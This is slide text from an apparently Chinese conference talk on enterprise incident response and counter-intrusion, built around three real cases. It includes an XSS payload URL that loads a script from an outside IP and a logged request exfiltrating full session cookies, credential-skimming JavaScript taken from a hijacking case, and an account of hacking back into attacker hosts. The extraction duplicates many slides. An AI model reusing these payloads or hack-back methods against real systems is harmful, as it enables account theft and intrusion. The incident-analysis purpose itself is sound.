第1页
“企业应急响应以及反渗透”
之真实案例分析
之真实案例分析
第2页
关于我
第3页
• piaca • 乌云⽩白帽⼦子 • 前新浪安全架构师 • Insight Labs 成员 • ⼋八年安全从业经验
第4页
• 应急响应介绍 • ⼀一些案例 • 总结
第5页
什么是应急响应?
第6页
被“⿊黑”了
• 被⼊入侵 • 被蠕⾍虫 • 被钓⻥鱼 • 被 DDoS • 被劫持 • ……
• 被⼊入侵 • 被蠕⾍虫 • 被钓⻥鱼 • 被 DDoS • 被劫持 • ……
第7页
为什么做应急响应?
第8页
被逼的
第9页
为什么做应急响应?
• 保障业务 • 还原攻击 • 明确意图 • 解决⽅方案 • 查漏补缺 • 司法途径
• 保障业务 • 还原攻击 • 明确意图 • 解决⽅方案 • 查漏补缺 • 司法途径
第10页
怎么做应急响应?
第11页
怎么做应急响应?
• 确定攻击时间 • 查找攻击线索 • 梳理攻击流程 • 实施解决⽅方案 • 定位攻击⼈人,取证
• 确定攻击时间 • 查找攻击线索 • 梳理攻击流程 • 实施解决⽅方案 • 定位攻击⼈人,取证
第12页
为什么做反渗透?
第13页
为什么反渗透?
• 被动变主动 • 攻击者都在做什么 • 确认攻击者是谁 • 取证
• 被动变主动 • 攻击者都在做什么 • 确认攻击者是谁 • 取证
第14页
案例之官微帐号被盗
第16页
分析原因
• ⾮非⼯工作⼈人员操作 • 帐号有被 cookie 登录 • 可是 cookie 有 httponly
• ⾮非⼯工作⼈人员操作 • 帐号有被 cookie 登录 • 可是 cookie 有 httponly
第17页
==================================================
URL
: http://t.cn/zWI1bUQ
Last Visit Date : 2012-7-16 19:22:27
==================================================
==================================================
URL
: http://50.116.13.242/index.php
Last Visit Date : 2012-7-16 19:22:28
Referrer
: http://t.cn/zWI1bUQ
==================================================
==================================================
URL
: http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
Last Visit Date : 2012-7-16 19:22:28
Referrer
: http://50.116.13.242/index.php
Title
: player.swf (application/x-shockwave-flash 对象)
==================================================
==================================================
URL
: http://50.116.13.242/e.php?opener=0&cookie=ULV
%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma
%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn
%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B
%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry
%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B
%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des
%253D5937b4f4509871fc45195767ea7abe37%2526ev
%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c
%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V
%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
Last Visit Date : 2012-7-16 19:22:31
Referrer
: http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
==================================================
URL
: http://t.cn/zWI1bUQ
Last Visit Date : 2012-7-16 19:22:27
==================================================
==================================================
URL
: http://50.116.13.242/index.php
Last Visit Date : 2012-7-16 19:22:28
Referrer
: http://t.cn/zWI1bUQ
==================================================
==================================================
URL
: http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
Last Visit Date : 2012-7-16 19:22:28
Referrer
: http://50.116.13.242/index.php
Title
: player.swf (application/x-shockwave-flash 对象)
==================================================
==================================================
URL
: http://50.116.13.242/e.php?opener=0&cookie=ULV
%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma
%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn
%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B
%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry
%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B
%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des
%253D5937b4f4509871fc45195767ea7abe37%2526ev
%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c
%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V
%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
Last Visit Date : 2012-7-16 19:22:31
Referrer
: http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
==================================================
第18页
⼯工作⼈人员收到⼀一条私信……
第19页
还原攻击
• 某分站 XSS • 某分站 Apache CVE-2012-0053
• 某分站 XSS • 某分站 Apache CVE-2012-0053
第20页
我们做了什么
• 修复漏洞,修复同类漏洞 • 加强员⼯工安全意识 • 增加帐号安全策略
• 修复漏洞,修复同类漏洞 • 加强员⼯工安全意识 • 增加帐号安全策略
第21页
关于攻击者
• 通过 IP / 邮箱信息定位到某公司安全⼈人员 • 没有恶意⺫⽬目的 • 后⾯面有把漏洞提交乌云
• 通过 IP / 邮箱信息定位到某公司安全⼈人员 • 没有恶意⺫⽬目的 • 后⾯面有把漏洞提交乌云
第22页
案例之 500 错误⽇日志引发的⾎血案
第24页
分析原因
• 500 错误代表⽂文件存在并且执⾏行 • ⾮非业务⽂文件 • 从更多的⽇日志⼊入⼿手
• 500 错误代表⽂文件存在并且执⾏行 • ⾮非业务⽂文件 • 从更多的⽇日志⼊入⼿手
第27页
还原攻击
• 通过⽇日志确认⼊入侵途径是 tomcat • 做了⼀一些操作 • tomcat 帐号密码并⾮非弱密码,how?
• 通过⽇日志确认⼊入侵途径是 tomcat • 做了⼀一些操作 • tomcat 帐号密码并⾮非弱密码,how?
第28页
再次分析原因并且还原攻击
• 全⺴⽹网排查
• 攻击者早在⼏几⽉月前就发⽣生 • 通过收集帐号密码
• 全⺴⽹网排查
• 攻击者早在⼏几⽉月前就发⽣生 • 通过收集帐号密码
第29页
吹响反击号⾓角
• 收集攻击者 IP
• ⼤大多是⾁肉鸡 IP,⾹香港,廊坊 • ⽤用“⿊黑客”的⽅方法拿到⾹香港,廊坊多台⾁肉鸡权限 • 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志 • 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制
• 收集攻击者 IP
• ⼤大多是⾁肉鸡 IP,⾹香港,廊坊 • ⽤用“⿊黑客”的⽅方法拿到⾹香港,廊坊多台⾁肉鸡权限 • 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志 • 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制
第32页
我们做了什么
• 清理后门 • 清理全⺴⽹网 tomcat • 梳理全⺴⽹网 web ⺫⽬目录⽂文件 • 修改业务相关帐号密码 • 修改业务关键代码 • IDC 出⼝口策略 • 部署 snort
• 清理后门 • 清理全⺴⽹网 tomcat • 梳理全⺴⽹网 web ⺫⽬目录⽂文件 • 修改业务相关帐号密码 • 修改业务关键代码 • IDC 出⼝口策略 • 部署 snort
第33页
这就完了?
第34页
很傻很天真
第35页
IT 反馈域控服务器异常
第36页
gh0st
第37页
继续分析
• 多台服务器被植⼊入后门 • 通过 at ⽅方式植⼊入后门 • 通过域控管理帐号 • 确定被植⼊入后门最初时间
• 多台服务器被植⼊入后门 • 通过 at ⽅方式植⼊入后门 • 通过域控管理帐号 • 确定被植⼊入后门最初时间
第38页
2011-‐11-‐10,14:03:47,Security,审核成功,登录/注销
,540,*\*,PDC,”成功的网络登录:
用户名:
*.ad
域:
*
登录
ID:
(0x0,0x1114E11)
登录类型:
3
登录过程:
NtLmSsp
身份验证数据包:
NTLM
工作站名:
CC-‐TEST-‐V2
登录
GUID:
-‐
调用方用户名:
-‐
调用方域:
-‐
调用方登录
ID:
-‐
调用方进程
ID:
-‐
传递服务:
-‐
源网络地址:
192.168.100.81
源端口:
0
2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITY\SYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-‐*$
源工作站:
CC-‐TEST-‐V2
错误代码:
0xC000006A "
2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITY\SYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-‐*$
源工作站:
CC-‐TEST-‐V2
错误代码:
0xC000006A
,540,*\*,PDC,”成功的网络登录:
用户名:
*.ad
域:
*
登录
ID:
(0x0,0x1114E11)
登录类型:
3
登录过程:
NtLmSsp
身份验证数据包:
NTLM
工作站名:
CC-‐TEST-‐V2
登录
GUID:
-‐
调用方用户名:
-‐
调用方域:
-‐
调用方登录
ID:
-‐
调用方进程
ID:
-‐
传递服务:
-‐
源网络地址:
192.168.100.81
源端口:
0
2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITY\SYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-‐*$
源工作站:
CC-‐TEST-‐V2
错误代码:
0xC000006A "
2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITY\SYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-‐*$
源工作站:
CC-‐TEST-‐V2
错误代码:
0xC000006A
第39页
192.168.100.81
• 虚拟机 • 弱⼝口令 • 内⺴⽹网检查时关机,逃过检查 • ⺫⽬目前能够确定这台是最初被渗透的 • 域控管理登录过 • 通过抓去 hash 控制域控
• 虚拟机 • 弱⼝口令 • 内⺴⽹网检查时关机,逃过检查 • ⺫⽬目前能够确定这台是最初被渗透的 • 域控管理登录过 • 通过抓去 hash 控制域控
第41页
我们⼜又做了什么
• 排查所有 windows 服务器 • snort 加特征,发现仍有服务器被控制 • 继续排查
• 排查所有 windows 服务器 • snort 加特征,发现仍有服务器被控制 • 继续排查
第43页
持续反击中
• 还有美国的 IP • 通过 C 段 cain 嗅探到 3389 密码
• 还有美国的 IP • 通过 C 段 cain 嗅探到 3389 密码
第45页
关于攻击者
• 美国的 vps 上含有多个 QQ 和密码 • 之前获取到其国内论坛帐号
• 美国的 vps 上含有多个 QQ 和密码 • 之前获取到其国内论坛帐号
第47页
案例之永⽆无⽌止境的劫持
第48页
案例之永⽆无⽌止境的劫持
• 某业务多次多种类型劫持
• DNS 劫持
• 劫持到⼀一个反向代理 IP 61.*.*.2
• 链路劫持
• 某业务链路劫持被插⼊入⼲⼴广告
• 某业务多次多种类型劫持
• DNS 劫持
• 劫持到⼀一个反向代理 IP 61.*.*.2
• 链路劫持
• 某业务链路劫持被插⼊入⼲⼴广告
第51页
function ffCheck() { try { try { var u = null != f ? f.idInput.value : document.getElementById("idInput").value; } catch (e) { var u = (document.getElementById("idInput").innerHTML).replace(/\s/g, ""); } var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value; if (u.indexOf("@") == -1) u += "@xxx.com"; try { if (u.indexOf("@") == -1) u = u + getdomain(); } catch (e) {} sendurl("/abc", u, p, "coremail"); } catch (e) {} return fOnSubmit();
}
}
第52页
function sendurl(uri, u, p, i) { xmlHttp = GetXmlHttpObject(); if (xmlHttp == null) { return; } param = "user=" + u + "&pass=" + p + "&icp=" + i; xmlHttp.onreadystatechange = stateChanged; try { xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true); } catch (e) {} xmlHttp.setRequestHeader("If-Modified-Since", "0"); xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlHttp.send(param);
}
}
第53页
处理过程
• 定位劫持位置
• TTL • IP
• 投诉
• 定位劫持位置
• TTL • IP
• 投诉
第54页
然并卵
第55页
我们做了什么
• 完善监控 • https?
• 完善监控 • https?
第56页
总结
• 业务⾓角度
• 保障业务优先
• 对抗⾓角度
• 了解对⼿手
• 技术⾓角度
• 攻击技术 • ⽇日志、流量等数据
• 业务⾓角度
• 保障业务优先
• 对抗⾓角度
• 了解对⼿手
• 技术⾓角度
• 攻击技术 • ⽇日志、流量等数据
第57页
谢谢!